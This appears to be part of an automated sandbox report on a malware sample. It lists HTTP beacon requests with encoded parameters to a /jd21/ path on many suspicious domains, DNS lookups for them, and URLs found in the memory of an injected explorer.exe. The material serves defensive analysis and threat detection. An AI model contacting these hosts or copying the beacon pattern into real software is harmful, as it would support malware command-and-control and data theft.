          Source: global trafficHTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=yaFk5fMSAGN82SCLgaCn8ag2pJ39IRNZ6T5Hukk791SUyW8vAMaB+rWiLjqwV1W2V2ID HTTP/1.1Host: www.circusenergy.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp HTTP/1.1Host: www.weight-loss-003.todayConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI HTTP/1.1Host: www.walk-in-tubs-30303.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=b/Dc4UkLHLZk59X8SmhgJ1uv172ipMqzAxiQNMhexpG5XWQ9Iwkd+tXAg5/cR36jPrSP HTTP/1.1Host: www.pools-80761.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix HTTP/1.1Host: www.legendhud.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.circusenergy.online
          Source: global trafficDNS traffic detected: DNS query: www.cyber-eu.digital
          Source: global trafficDNS traffic detected: DNS query: www.weight-loss-003.today
          Source: global trafficDNS traffic detected: DNS query: www.xmld101.icu
          Source: global trafficDNS traffic detected: DNS query: www.walk-in-tubs-30303.bond
          Source: global trafficDNS traffic detected: DNS query: www.r86gd377hi.rent
          Source: global trafficDNS traffic detected: DNS query: www.thetrue.one
          Source: global trafficDNS traffic detected: DNS query: www.tvtwenty20sr.top
          Source: global trafficDNS traffic detected: DNS query: www.pools-80761.bond
          Source: global trafficDNS traffic detected: DNS query: www.legendhud.shop
          Source: global trafficDNS traffic detected: DNS query: www.borghardt.xyz
          Source: global trafficDNS traffic detected: DNS query: www.slab-leak-repair-74697.bond
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.1455128330.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1461856783.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3850369503.00000000082D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alqahtani.site
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alqahtani.site/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alqahtani.site/jd21/www.propertiesforrentus11.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alqahtani.siteReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apple0ficial-ld.info
          Source: explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apple0ficial-ld.info/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apple0ficial-ld.infoReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.borghardt.xyz
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.borghardt.xyz/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.borghardt.xyz/jd21/www.slab-leak-repair-74697.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.borghardt.xyzReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.circusenergy.online
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.circusenergy.online/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.circusenergy.online/jd21/www.cyber-eu.digital
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.circusenergy.onlineReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cyber-eu.digital
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cyber-eu.digital/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cyber-eu.digital/jd21/www.weight-loss-003.today
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cyber-eu.digitalReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.legendhud.shop
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.legendhud.shop/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.legendhud.shop/jd21/www.borghardt.xyz
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.legendhud.shopReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pools-80761.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pools-80761.bond/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pools-80761.bond/jd21/www.legendhud.shop
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pools-80761.bondReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesforrentus11.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesforrentus11.bond/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesforrentus11.bond/jd21/www.apple0ficial-ld.info
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesforrentus11.bondReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r86gd377hi.rent
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r86gd377hi.rent/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r86gd377hi.rent/jd21/www.thetrue.one
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r86gd377hi.rentReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.slab-leak-repair-74697.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.slab-leak-repair-74697.bond/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.slab-leak-repair-74697.bond/jd21/www.tyumk.xyz
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.slab-leak-repair-74697.bondReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetrue.one
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetrue.one/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetrue.one/jd21/www.tvtwenty20sr.top
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetrue.oneReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tvtwenty20sr.top
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tvtwenty20sr.top/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tvtwenty20sr.top/jd21/www.pools-80761.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tvtwenty20sr.topReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz/jd21/www.alqahtani.site
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyzReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.walk-in-tubs-30303.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.walk-in-tubs-30303.bond/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.walk-in-tubs-30303.bond/jd21/www.r86gd377hi.rent
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.walk-in-tubs-30303.bondReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.weight-loss-003.today
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.weight-loss-003.today/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.weight-loss-003.today/jd21/www.xmld101.icu
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.weight-loss-003.todayReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xmld101.icu
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xmld101.icu/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xmld101.icu/jd21/www.walk-in-tubs-30303.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xmld101.icuReferer:
          Source: explorer.exe, 00000003.00000000.1469409871.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292310130.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3858182302.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
